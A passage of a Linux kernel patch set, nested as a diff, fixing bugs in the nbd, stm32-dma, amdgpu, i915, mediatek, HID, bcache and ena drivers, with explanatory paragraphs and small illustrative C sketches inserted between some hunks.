+-	nsock = config->socks[args->index];
+ 	mutex_lock(&nsock->tx_lock);
+ 	nbd_mark_nsock_dead(nbd, nsock, 1);
+ 	mutex_unlock(&nsock->tx_lock);
+@@ -1214,6 +1221,7 @@ static int nbd_reconnect_socket(struct nbd_device *nbd, unsigned long arg)
+ 		INIT_WORK(&args->work, recv_work);
+ 		args->index = i;
+ 		args->nbd = nbd;
++		args->nsock = nsock;
+ 		nsock->cookie++;
+ 		mutex_unlock(&nsock->tx_lock);
+ 		sockfd_put(old);
+@@ -1396,6 +1404,7 @@ static int nbd_start_device(struct nbd_device *nbd)
+ 		refcount_inc(&nbd->config_refs);
+ 		INIT_WORK(&args->work, recv_work);
+ 		args->nbd = nbd;
++		args->nsock = config->socks[i];
+ 		args->index = i;
+ 		queue_work(nbd->recv_workq, &args->work);
+ 	}
+@@ -1530,17 +1539,20 @@ static int nbd_ioctl(struct block_device *bdev, fmode_t mode,
+ 	return error;
+ }
+ 
+-static struct nbd_config *nbd_alloc_config(void)
++static int nbd_alloc_and_init_config(struct nbd_device *nbd)
+ {
+ 	struct nbd_config *config;
+ 
++	if (WARN_ON(nbd->config))
++		return -EINVAL;
++
+ 	if (!try_module_get(THIS_MODULE))
+-		return ERR_PTR(-ENODEV);
++		return -ENODEV;
+ 
+ 	config = kzalloc(sizeof(struct nbd_config), GFP_NOFS);
+ 	if (!config) {
+ 		module_put(THIS_MODULE);
+-		return ERR_PTR(-ENOMEM);
++		return -ENOMEM;
+ 	}
+ 
+ 	atomic_set(&config->recv_threads, 0);
+@@ -1548,7 +1560,10 @@ static struct nbd_config *nbd_alloc_config(void)
+ 	init_waitqueue_head(&config->conn_wait);
+ 	config->blksize_bits = NBD_DEF_BLKSIZE_BITS;
+ 	atomic_set(&config->live_connections, 0);
+-	return config;
++	nbd->config = config;
++	refcount_set(&nbd->config_refs, 1);
++
++	return 0;
+ }
+ 
+ static int nbd_open(struct block_device *bdev, fmode_t mode)
+@@ -1567,21 +1582,17 @@ static int nbd_open(struct block_device *bdev, fmode_t mode)
+ 		goto out;
+ 	}
+ 	if (!refcount_inc_not_zero(&nbd->config_refs)) {
+-		struct nbd_config *config;
+-
+ 		mutex_lock(&nbd->config_lock);
+ 		if (refcount_inc_not_zero(&nbd->config_refs)) {
+ 			mutex_unlock(&nbd->config_lock);
+ 			goto out;
+ 		}
+-		config = nbd_alloc_config();
+-		if (IS_ERR(config)) {
+-			ret = PTR_ERR(config);
++		ret = nbd_alloc_and_init_config(nbd);
++		if (ret) {
+ 			mutex_unlock(&nbd->config_lock);
+ 			goto out;
+ 		}
+-		nbd->config = config;
+-		refcount_set(&nbd->config_refs, 1);
++
+ 		refcount_inc(&nbd->refs);
+ 		mutex_unlock(&nbd->config_lock);
+ 		if (max_part)
+@@ -1990,22 +2001,17 @@ again:
+ 		pr_err("nbd%d already in use\n", index);
+ 		return -EBUSY;
+ 	}
+-	if (WARN_ON(nbd->config)) {
+-		mutex_unlock(&nbd->config_lock);
+-		nbd_put(nbd);
+-		return -EINVAL;
+-	}
+-	config = nbd_alloc_config();
+-	if (IS_ERR(config)) {
++
++	ret = nbd_alloc_and_init_config(nbd);
++	if (ret) {
+ 		mutex_unlock(&nbd->config_lock);
+ 		nbd_put(nbd);
+ 		pr_err("couldn't allocate config\n");
+-		return PTR_ERR(config);
++		return ret;
+ 	}
+-	nbd->config = config;
+-	refcount_set(&nbd->config_refs, 1);
+-	set_bit(NBD_RT_BOUND, &config->runtime_flags);
+ 
++	config = nbd->config;
++	set_bit(NBD_RT_BOUND, &config->runtime_flags);
+ 	ret = nbd_genl_size_set(info, nbd);
+ 	if (ret)
+ 		goto out;
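
The nbd changes above follow a common refactoring shape: instead of re-deriving the socket from an index each time (a lookup that can race with reconnects swapping config->socks[i]), the resolved pointer is captured once and threaded through. A hedged sketch of that shape, with hypothetical names:

#include <linux/net.h>

struct conn { struct socket *sock; };
struct cfg  { struct conn **socks; };

/* Low-level worker takes the already-resolved resource ... */
static int do_io(struct socket *sock, void *buf, size_t len)
{
	/* uses sock directly; no index lookup that could race */
	return 0;
}

/* ... and the index-based wrapper only performs the lookup. */
static int do_io_idx(struct cfg *cfg, int index, void *buf, size_t len)
{
	return do_io(cfg->socks[index]->sock, buf, len);
}
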
+diff --git a/drivers/dma/stm32-dma.c b/drivers/dma/stm32-dma.c
+index 592d48ecf241f..7abcd7f2848ee 100644
+--- a/drivers/dma/stm32-dma.c
++++ b/drivers/dma/stm32-dma.c
+@@ -1249,8 +1249,8 @@ static struct dma_async_tx_descriptor *stm32_dma_prep_dma_memcpy(
+ 	enum dma_slave_buswidth max_width;
+ 	struct stm32_dma_desc *desc;
+ 	size_t xfer_count, offset;
+-	u32 num_sgs, best_burst, dma_burst, threshold;
+-	int i;
++	u32 num_sgs, best_burst, threshold;
++	int dma_burst, i;
+ 
+ 	num_sgs = DIV_ROUND_UP(len, STM32_DMA_ALIGNED_MAX_DATA_ITEMS);
+ 	desc = kzalloc(struct_size(desc, sg_req, num_sgs), GFP_NOWAIT);
+@@ -1268,6 +1268,10 @@ static struct dma_async_tx_descriptor *stm32_dma_prep_dma_memcpy(
+ 		best_burst = stm32_dma_get_best_burst(len, STM32_DMA_MAX_BURST,
+ 						      threshold, max_width);
+ 		dma_burst = stm32_dma_get_burst(chan, best_burst);
++		if (dma_burst < 0) {
++			kfree(desc);
++			return NULL;
++		}
+ 
+ 		stm32_dma_clear_reg(&desc->sg_req[i].chan_reg);
+ 		desc->sg_req[i].chan_reg.dma_scr =
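
The stm32-dma fix above is a recurring pitfall: a helper that returns either a small encoded value or a negative errno must land in a signed variable, otherwise the `< 0` check can never fire. A minimal sketch (hypothetical encoding, not the real STM32 register layout):

#include <linux/errno.h>
#include <linux/log2.h>
#include <linux/types.h>

/* Returns an encoded burst field, or -EINVAL for unsupported sizes. */
static int encode_burst(unsigned int burst)
{
	if (!is_power_of_2(burst) || burst > 16)
		return -EINVAL;
	return ilog2(burst);
}

static int program_burst(unsigned int best, u32 *field)
{
	int code = encode_burst(best);	/* signed on purpose */

	if (code < 0)
		return code;	/* a u32 here would hide the sign bit */
	*field = code;
	return 0;
}
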
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+index 4642cff0e1a4f..69b3829bbe53f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+@@ -631,13 +631,14 @@ static void amdgpu_vm_pt_free(struct amdgpu_vm_bo_base *entry)
+ 
+ 	if (!entry->bo)
+ 		return;
++
++	entry->bo->vm_bo = NULL;
+ 	shadow = amdgpu_bo_shadowed(entry->bo);
+ 	if (shadow) {
+ 		ttm_bo_set_bulk_move(&shadow->tbo, NULL);
+ 		amdgpu_bo_unref(&shadow);
+ 	}
+ 	ttm_bo_set_bulk_move(&entry->bo->tbo, NULL);
+-	entry->bo->vm_bo = NULL;
+ 
+ 	spin_lock(&entry->vm->status_lock);
+ 	list_del(&entry->vm_status);
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+index 809eca54fc617..856db876af141 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+@@ -1690,6 +1690,32 @@ static void sdma_v5_2_get_clockgating_state(void *handle, u64 *flags)
+ 		*flags |= AMD_CG_SUPPORT_SDMA_LS;
+ }
+ 
++static void sdma_v5_2_ring_begin_use(struct amdgpu_ring *ring)
++{
++	struct amdgpu_device *adev = ring->adev;
++
++	/* SDMA 5.2.3 (RMB) FW doesn't seem to properly
++	 * disallow GFXOFF in some cases leading to
++	 * hangs in SDMA.  Disallow GFXOFF while SDMA is active.
++	 * We can probably just limit this to 5.2.3,
++	 * but it shouldn't hurt for other parts since
++	 * GFXOFF will be disallowed anyway when SDMA is
++	 * active; this just makes it explicit.
++	 */
++	amdgpu_gfx_off_ctrl(adev, false);
++}
++
++static void sdma_v5_2_ring_end_use(struct amdgpu_ring *ring)
++{
++	struct amdgpu_device *adev = ring->adev;
++
++	/* SDMA 5.2.3 (RMB) FW doesn't seem to properly
++	 * disallow GFXOFF in some cases leading to
++	 * hangs in SDMA.  Allow GFXOFF when SDMA is complete.
++	 */
++	amdgpu_gfx_off_ctrl(adev, true);
++}
++
+ const struct amd_ip_funcs sdma_v5_2_ip_funcs = {
+ 	.name = "sdma_v5_2",
+ 	.early_init = sdma_v5_2_early_init,
+@@ -1738,6 +1764,8 @@ static const struct amdgpu_ring_funcs sdma_v5_2_ring_funcs = {
+ 	.test_ib = sdma_v5_2_ring_test_ib,
+ 	.insert_nop = sdma_v5_2_ring_insert_nop,
+ 	.pad_ib = sdma_v5_2_ring_pad_ib,
++	.begin_use = sdma_v5_2_ring_begin_use,
++	.end_use = sdma_v5_2_ring_end_use,
+ 	.emit_wreg = sdma_v5_2_ring_emit_wreg,
+ 	.emit_reg_wait = sdma_v5_2_ring_emit_reg_wait,
+ 	.emit_reg_write_reg_wait = sdma_v5_2_ring_emit_reg_write_reg_wait,
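
The new begin_use/end_use hooks bracket every period of ring activity with a GFXOFF disallow/allow pair; since multiple rings can be active at once, this only composes if the underlying control is reference counted (which amdgpu_gfx_off_ctrl() is, to my understanding). A hypothetical refcount sketch of the idea, illustrative only and not the actual amdgpu implementation:

#include <linux/bug.h>
#include <linux/mutex.h>
#include <linux/types.h>

struct gfxoff_ctl {
	struct mutex lock;
	unsigned int disallow_cnt;	/* GFXOFF permitted only at zero */
};

static void gfx_off_ctrl(struct gfxoff_ctl *g, bool allow)
{
	mutex_lock(&g->lock);
	if (!allow)
		g->disallow_cnt++;		/* ring busy: keep GFX powered */
	else if (!WARN_ON(!g->disallow_cnt))
		g->disallow_cnt--;		/* last end_use re-permits GFXOFF */
	mutex_unlock(&g->lock);
}
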
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+index 9edd39322c822..67287ad07226c 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+@@ -816,6 +816,8 @@ bool is_psr_su_specific_panel(struct dc_link *link)
+ 				((dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x08) ||
+ 				(dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x07)))
+ 				isPSRSUSupported = false;
++			else if (dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x03)
++				isPSRSUSupported = false;
+ 			else if (dpcd_caps->psr_info.force_psrsu_cap == 0x1)
+ 				isPSRSUSupported = true;
+ 		}
+diff --git a/drivers/gpu/drm/i915/display/intel_fb.c b/drivers/gpu/drm/i915/display/intel_fb.c
+index eefa33c555aca..23d854bd73b77 100644
+--- a/drivers/gpu/drm/i915/display/intel_fb.c
++++ b/drivers/gpu/drm/i915/display/intel_fb.c
+@@ -1441,8 +1441,20 @@ static u32 calc_plane_remap_info(const struct intel_framebuffer *fb, int color_p
+ 
+ 			size += remap_info->size;
+ 		} else {
+-			unsigned int dst_stride = plane_view_dst_stride_tiles(fb, color_plane,
+-									      remap_info->width);
++			unsigned int dst_stride;
++
++			/*
++			 * The hardware automagically calculates the CCS AUX surface
++			 * stride from the main surface stride, so we can't really remap a
++			 * smaller subset (unless we'd remap in whole AUX page units).
++			 */
++			if (intel_fb_needs_pot_stride_remap(fb) &&
++			    intel_fb_is_ccs_modifier(fb->base.modifier))
++				dst_stride = remap_info->src_stride;
++			else
++				dst_stride = remap_info->width;
++
++			dst_stride = plane_view_dst_stride_tiles(fb, color_plane, dst_stride);
+ 
+ 			assign_chk_ovf(i915, remap_info->dst_stride, dst_stride);
+ 			color_plane_info->mapping_stride = dst_stride *
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 7fb52a573436e..558000db4a100 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -736,6 +736,7 @@ static void mtk_drm_crtc_atomic_begin(struct drm_crtc *crtc,
+ 									  crtc);
+ 	struct mtk_crtc_state *mtk_crtc_state = to_mtk_crtc_state(crtc_state);
+ 	struct mtk_drm_crtc *mtk_crtc = to_mtk_crtc(crtc);
++	unsigned long flags;
+ 
+ 	if (mtk_crtc->event && mtk_crtc_state->base.event)
+ 		DRM_ERROR("new event while there is still a pending event\n");
+@@ -743,7 +744,11 @@ static void mtk_drm_crtc_atomic_begin(struct drm_crtc *crtc,
+ 	if (mtk_crtc_state->base.event) {
+ 		mtk_crtc_state->base.event->pipe = drm_crtc_index(crtc);
+ 		WARN_ON(drm_crtc_vblank_get(crtc) != 0);
++
++		spin_lock_irqsave(&crtc->dev->event_lock, flags);
+ 		mtk_crtc->event = mtk_crtc_state->base.event;
++		spin_unlock_irqrestore(&crtc->dev->event_lock, flags);
++
+ 		mtk_crtc_state->base.event = NULL;
+ 	}
+ }
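
dev->event_lock is what the DRM vblank interrupt path holds while completing pageflip events, so assigning mtk_crtc->event without it raced against the handler. A sketch of the consuming side under the same lock (hypothetical driver struct; drm_crtc_send_vblank_event() is documented to require event_lock held):

#include <drm/drm_crtc.h>
#include <drm/drm_vblank.h>
#include <linux/spinlock.h>

struct my_crtc {
	struct drm_crtc base;
	struct drm_pending_vblank_event *event;
};

/* Called from the vblank interrupt: consume the published event. */
static void my_crtc_finish_event(struct my_crtc *mc)
{
	struct drm_device *dev = mc->base.dev;
	unsigned long flags;

	spin_lock_irqsave(&dev->event_lock, flags);
	if (mc->event) {
		drm_crtc_send_vblank_event(&mc->base, mc->event);
		mc->event = NULL;
	}
	spin_unlock_irqrestore(&dev->event_lock, flags);
}
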
+diff --git a/drivers/hid/hid-asus.c b/drivers/hid/hid-asus.c
+index d1094bb1aa429..220d6b2af4d3f 100644
+--- a/drivers/hid/hid-asus.c
++++ b/drivers/hid/hid-asus.c
+@@ -380,7 +380,7 @@ static int asus_raw_event(struct hid_device *hdev,
+ 	return 0;
+ }
+ 
+-static int asus_kbd_set_report(struct hid_device *hdev, u8 *buf, size_t buf_size)
++static int asus_kbd_set_report(struct hid_device *hdev, const u8 *buf, size_t buf_size)
+ {
+ 	unsigned char *dmabuf;
+ 	int ret;
+@@ -403,7 +403,7 @@ static int asus_kbd_set_report(struct hid_device *hdev, u8 *buf, size_t buf_size
+ 
+ static int asus_kbd_init(struct hid_device *hdev)
+ {
+-	u8 buf[] = { FEATURE_KBD_REPORT_ID, 0x41, 0x53, 0x55, 0x53, 0x20, 0x54,
++	const u8 buf[] = { FEATURE_KBD_REPORT_ID, 0x41, 0x53, 0x55, 0x53, 0x20, 0x54,
+ 		     0x65, 0x63, 0x68, 0x2e, 0x49, 0x6e, 0x63, 0x2e, 0x00 };
+ 	int ret;
+ 
+@@ -417,7 +417,7 @@ static int asus_kbd_init(struct hid_device *hdev)
+ static int asus_kbd_get_functions(struct hid_device *hdev,
+ 				  unsigned char *kbd_func)
+ {
+-	u8 buf[] = { FEATURE_KBD_REPORT_ID, 0x05, 0x20, 0x31, 0x00, 0x08 };
++	const u8 buf[] = { FEATURE_KBD_REPORT_ID, 0x05, 0x20, 0x31, 0x00, 0x08 };
+ 	u8 *readbuf;
+ 	int ret;
+ 
+@@ -448,7 +448,7 @@ static int asus_kbd_get_functions(struct hid_device *hdev,
+ 
+ static int rog_nkey_led_init(struct hid_device *hdev)
+ {
+-	u8 buf_init_start[] = { FEATURE_KBD_LED_REPORT_ID1, 0xB9 };
++	const u8 buf_init_start[] = { FEATURE_KBD_LED_REPORT_ID1, 0xB9 };
+ 	u8 buf_init2[] = { FEATURE_KBD_LED_REPORT_ID1, 0x41, 0x53, 0x55, 0x53, 0x20,
+ 				0x54, 0x65, 0x63, 0x68, 0x2e, 0x49, 0x6e, 0x63, 0x2e, 0x00 };
+ 	u8 buf_init3[] = { FEATURE_KBD_LED_REPORT_ID1,
+@@ -1012,6 +1012,24 @@ static int asus_start_multitouch(struct hid_device *hdev)
+ 	return 0;
+ }
+ 
++static int __maybe_unused asus_resume(struct hid_device *hdev)
++{
++	struct asus_drvdata *drvdata = hid_get_drvdata(hdev);
++	int ret = 0;
++
++	if (drvdata->kbd_backlight) {
++		const u8 buf[] = { FEATURE_KBD_REPORT_ID, 0xba, 0xc5, 0xc4,
++				drvdata->kbd_backlight->cdev.brightness };
++		ret = asus_kbd_set_report(hdev, buf, sizeof(buf));
++		if (ret < 0) {
++			hid_err(hdev, "Asus failed to set keyboard backlight: %d\n", ret);
++			goto asus_resume_err;
++		}
++	}
++
++asus_resume_err:
++	return ret;
++}
++
+ static int __maybe_unused asus_reset_resume(struct hid_device *hdev)
+ {
+ 	struct asus_drvdata *drvdata = hid_get_drvdata(hdev);
+@@ -1303,6 +1321,7 @@ static struct hid_driver asus_driver = {
+ 	.input_configured       = asus_input_configured,
+ #ifdef CONFIG_PM
+ 	.reset_resume           = asus_reset_resume,
+	.resume                 = asus_resume,
+ #endif
+ 	.event			= asus_event,
+ 	.raw_event		= asus_raw_event
+diff --git a/drivers/hid/hid-glorious.c b/drivers/hid/hid-glorious.c
+index 558eb08c19ef9..281b3a7187cec 100644
+--- a/drivers/hid/hid-glorious.c
++++ b/drivers/hid/hid-glorious.c
+@@ -21,6 +21,10 @@ MODULE_DESCRIPTION("HID driver for Glorious PC Gaming Race mice");
+  * Glorious Model O and O- specify the const flag in the consumer input
+  * report descriptor, which leads to inputs being ignored. Fix this
+  * by patching the descriptor.
++ *
++ * Glorious Model I incorrectly specifies the Usage Minimum for its
++ * keyboard HID report, causing keycodes to be misinterpreted.
++ * Fix this by setting Usage Minimum to 0 in that report.
+  */
+ static __u8 *glorious_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 		unsigned int *rsize)
+@@ -32,6 +36,10 @@ static __u8 *glorious_report_fixup(struct hid_device *hdev, __u8 *rdesc,
+ 		rdesc[85] = rdesc[113] = rdesc[141] = \
+ 			HID_MAIN_ITEM_VARIABLE | HID_MAIN_ITEM_RELATIVE;
+ 	}
++	if (*rsize == 156 && rdesc[41] == 1) {
++		hid_info(hdev, "patching Glorious Model I keyboard report descriptor\n");
++		rdesc[41] = 0;
++	}
+ 	return rdesc;
+ }
+ 
+@@ -44,6 +52,8 @@ static void glorious_update_name(struct hid_device *hdev)
+ 		model = "Model O"; break;
+ 	case USB_DEVICE_ID_GLORIOUS_MODEL_D:
+ 		model = "Model D"; break;
++	case USB_DEVICE_ID_GLORIOUS_MODEL_I:
++		model = "Model I"; break;
+ 	}
+ 
+ 	snprintf(hdev->name, sizeof(hdev->name), "%s %s", "Glorious", model);
+@@ -66,10 +76,12 @@ static int glorious_probe(struct hid_device *hdev,
+ }
+ 
+ static const struct hid_device_id glorious_devices[] = {
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_GLORIOUS,
++	{ HID_USB_DEVICE(USB_VENDOR_ID_SINOWEALTH,
+ 		USB_DEVICE_ID_GLORIOUS_MODEL_O) },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_GLORIOUS,
++	{ HID_USB_DEVICE(USB_VENDOR_ID_SINOWEALTH,
+ 		USB_DEVICE_ID_GLORIOUS_MODEL_D) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_LAVIEW,
++		USB_DEVICE_ID_GLORIOUS_MODEL_I) },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(hid, glorious_devices);
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 130fc5f341422..1be454bafcb91 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -503,10 +503,6 @@
+ #define USB_DEVICE_ID_GENERAL_TOUCH_WIN8_PIT_010A 0x010a
+ #define USB_DEVICE_ID_GENERAL_TOUCH_WIN8_PIT_E100 0xe100
+ 
+-#define USB_VENDOR_ID_GLORIOUS  0x258a
+-#define USB_DEVICE_ID_GLORIOUS_MODEL_D 0x0033
+-#define USB_DEVICE_ID_GLORIOUS_MODEL_O 0x0036
+-
+ #define I2C_VENDOR_ID_GOODIX		0x27c6
+ #define I2C_DEVICE_ID_GOODIX_01F0	0x01f0
+ 
+@@ -729,6 +725,9 @@
+ #define USB_VENDOR_ID_LABTEC		0x1020
+ #define USB_DEVICE_ID_LABTEC_WIRELESS_KEYBOARD	0x0006
+ 
++#define USB_VENDOR_ID_LAVIEW		0x22D4
++#define USB_DEVICE_ID_GLORIOUS_MODEL_I	0x1503
++
+ #define USB_VENDOR_ID_LCPOWER		0x1241
+ #define USB_DEVICE_ID_LCPOWER_LC1000	0xf767
+ 
+@@ -1131,6 +1130,10 @@
+ #define USB_VENDOR_ID_SIGMATEL		0x066F
+ #define USB_DEVICE_ID_SIGMATEL_STMP3780	0x3780
+ 
++#define USB_VENDOR_ID_SINOWEALTH  0x258a
++#define USB_DEVICE_ID_GLORIOUS_MODEL_D 0x0033
++#define USB_DEVICE_ID_GLORIOUS_MODEL_O 0x0036
++
+ #define USB_VENDOR_ID_SIS_TOUCH		0x0457
+ #define USB_DEVICE_ID_SIS9200_TOUCH	0x9200
+ #define USB_DEVICE_ID_SIS817_TOUCH	0x0817
+diff --git a/drivers/hid/hid-lenovo.c b/drivers/hid/hid-lenovo.c
+index 7c1b33be9d134..149a3c74346b4 100644
+--- a/drivers/hid/hid-lenovo.c
++++ b/drivers/hid/hid-lenovo.c
+@@ -692,7 +692,8 @@ static int lenovo_event_cptkbd(struct hid_device *hdev,
+ 		 * so set middlebutton_state to 3
+ 		 * to never apply workaround anymore
+ 		 */
+-		if (cptkbd_data->middlebutton_state == 1 &&
++		if (hdev->product == USB_DEVICE_ID_LENOVO_CUSBKBD &&
++				cptkbd_data->middlebutton_state == 1 &&
+ 				usage->type == EV_REL &&
+ 				(usage->code == REL_X || usage->code == REL_Y)) {
+ 			cptkbd_data->middlebutton_state = 3;
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 8db4ae05febc8..5ec1f174127a3 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -2048,6 +2048,11 @@ static const struct hid_device_id mt_devices[] = {
+ 		MT_USB_DEVICE(USB_VENDOR_ID_HANVON_ALT,
+ 			USB_DEVICE_ID_HANVON_ALT_MULTITOUCH) },
+ 
++	/* HONOR GLO-GXXX panel */
++	{ .driver_data = MT_CLS_VTL,
++		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
++			0x347d, 0x7853) },
++
+ 	/* Ilitek dual touch panel */
+ 	{  .driver_data = MT_CLS_NSMU,
+ 		MT_USB_DEVICE(USB_VENDOR_ID_ILITEK,
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 056bb32091285..60884066362a1 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -33,6 +33,7 @@ static const struct hid_device_id hid_quirks[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_AKAI, USB_DEVICE_ID_AKAI_MPKMINI2), HID_QUIRK_NO_INIT_REPORTS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ALPS, USB_DEVICE_ID_IBM_GAMEPAD), HID_QUIRK_BADPAD },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_AMI, USB_DEVICE_ID_AMI_VIRT_KEYBOARD_AND_MOUSE), HID_QUIRK_ALWAYS_POLL },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_ALU_REVB_ANSI), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ATEN, USB_DEVICE_ID_ATEN_2PORTKVM), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ATEN, USB_DEVICE_ID_ATEN_4PORTKVMC), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ATEN, USB_DEVICE_ID_ATEN_4PORTKVM), HID_QUIRK_NOGET },
+diff --git a/drivers/md/bcache/bcache.h b/drivers/md/bcache/bcache.h
+index aebb7ef10e631..e86fa736dc4ee 100644
+--- a/drivers/md/bcache/bcache.h
++++ b/drivers/md/bcache/bcache.h
+@@ -265,6 +265,7 @@ struct bcache_device {
+ #define BCACHE_DEV_WB_RUNNING		3
+ #define BCACHE_DEV_RATE_DW_RUNNING	4
+ 	int			nr_stripes;
++#define BCH_MIN_STRIPE_SZ		((4 << 20) >> SECTOR_SHIFT)
+ 	unsigned int		stripe_size;
+ 	atomic_t		*stripe_sectors_dirty;
+ 	unsigned long		*full_dirty_stripes;
+diff --git a/drivers/md/bcache/btree.c b/drivers/md/bcache/btree.c
+index 05e3157fc7b4e..6a2f57ae0f3c2 100644
+--- a/drivers/md/bcache/btree.c
++++ b/drivers/md/bcache/btree.c
+@@ -974,6 +974,9 @@ err:
+  *
+  * The btree node will have either a read or a write lock held, depending on
+  * level and op->lock.
++ *
++ * Note: only an ERR_PTR() error code or a valid btree pointer is returned;
++ *       it is unnecessary for callers to check for a NULL pointer.
+  */
+ struct btree *bch_btree_node_get(struct cache_set *c, struct btree_op *op,
+ 				 struct bkey *k, int level, bool write,
+@@ -1085,6 +1088,10 @@ retry:
+ 	mutex_unlock(&b->c->bucket_lock);
+ }
+ 
++/*
++ * Only an ERR_PTR() error code or a valid btree pointer is returned; it is
++ * unnecessary for callers to check for a NULL pointer.
++ */
+ struct btree *__bch_btree_node_alloc(struct cache_set *c, struct btree_op *op,
+ 				     int level, bool wait,
+ 				     struct btree *parent)
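
Both bcache comments above state the same contract that the super.c hunk just below relies on when it relaxes IS_ERR_OR_NULL() to IS_ERR(): a function returning either a valid pointer or an ERR_PTR()-encoded errno never returns NULL, so one check suffices. A compact sketch of the convention (hypothetical struct foo):

#include <linux/err.h>
#include <linux/slab.h>

struct foo { int x; };

/* Contract: a valid object or ERR_PTR(-errno), never NULL. */
static struct foo *foo_alloc(void)
{
	struct foo *f = kzalloc(sizeof(*f), GFP_KERNEL);

	if (!f)
		return ERR_PTR(-ENOMEM);	/* encode, don't return NULL */
	return f;
}

static int foo_use(void)
{
	struct foo *f = foo_alloc();

	if (IS_ERR(f))		/* IS_ERR_OR_NULL() would be redundant */
		return PTR_ERR(f);
	kfree(f);
	return 0;
}
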
+diff --git a/drivers/md/bcache/super.c b/drivers/md/bcache/super.c
+index 7660962e7b8b4..70e5bd8961d2f 100644
+--- a/drivers/md/bcache/super.c
++++ b/drivers/md/bcache/super.c
+@@ -905,6 +905,8 @@ static int bcache_device_init(struct bcache_device *d, unsigned int block_size,
+ 
+ 	if (!d->stripe_size)
+ 		d->stripe_size = 1 << 31;
++	else if (d->stripe_size < BCH_MIN_STRIPE_SZ)
++		d->stripe_size = roundup(BCH_MIN_STRIPE_SZ, d->stripe_size);
+ 
+ 	n = DIV_ROUND_UP_ULL(sectors, d->stripe_size);
+ 	if (!n || n > max_stripes) {
+@@ -2017,7 +2019,7 @@ static int run_cache_set(struct cache_set *c)
+ 		c->root = bch_btree_node_get(c, NULL, k,
+ 					     j->btree_level,
+ 					     true, NULL);
+-		if (IS_ERR_OR_NULL(c->root))
++		if (IS_ERR(c->root))
+ 			goto err;
+ 
+ 		list_del_init(&c->root->list);
+diff --git a/drivers/md/bcache/writeback.c b/drivers/md/bcache/writeback.c
+index 01c7c6ca4789f..18c6e0d2877b5 100644
+--- a/drivers/md/bcache/writeback.c
++++ b/drivers/md/bcache/writeback.c
+@@ -913,7 +913,7 @@ static int bch_dirty_init_thread(void *arg)
+ 	int cur_idx, prev_idx, skip_nr;
+ 
+ 	k = p = NULL;
+-	cur_idx = prev_idx = 0;
++	prev_idx = 0;
+ 
+ 	bch_btree_iter_init(&c->root->keys, &iter, NULL);
+ 	k = bch_btree_iter_next_filter(&iter, &c->root->keys, bch_ptr_bad);
+diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.c b/drivers/net/ethernet/amazon/ena/ena_eth_com.c
+index 3d6f0a466a9ed..f9f886289b970 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_eth_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.c
+@@ -328,9 +328,6 @@ static int ena_com_create_and_store_tx_meta_desc(struct ena_com_io_sq *io_sq,
+ 	 * compare it to the stored version, just create the meta
+ 	 */
+ 	if (io_sq->disable_meta_caching) {
+-		if (unlikely(!ena_tx_ctx->meta_valid))
+-			return -EINVAL;
+-
+ 		*have_meta = true;
+ 		return ena_com_create_meta(io_sq, ena_meta);
+ 	}
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 42a66b74c1e5b..044b8afde69a0 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -74,6 +74,8 @@ static void ena_unmap_tx_buff(struct ena_ring *tx_ring,
+ 			      struct ena_tx_buffer *tx_info);
+ static int ena_create_io_tx_queues_in_range(struct ena_adapter *adapter,
+ 					    int first_index, int count);
++static void ena_free_all_io_tx_resources_in_range(struct ena_adapter *adapter,
++						  int first_index, int count);
+ 
+ /* Increase a stat by cnt while holding syncp seqlock on 32bit machines */
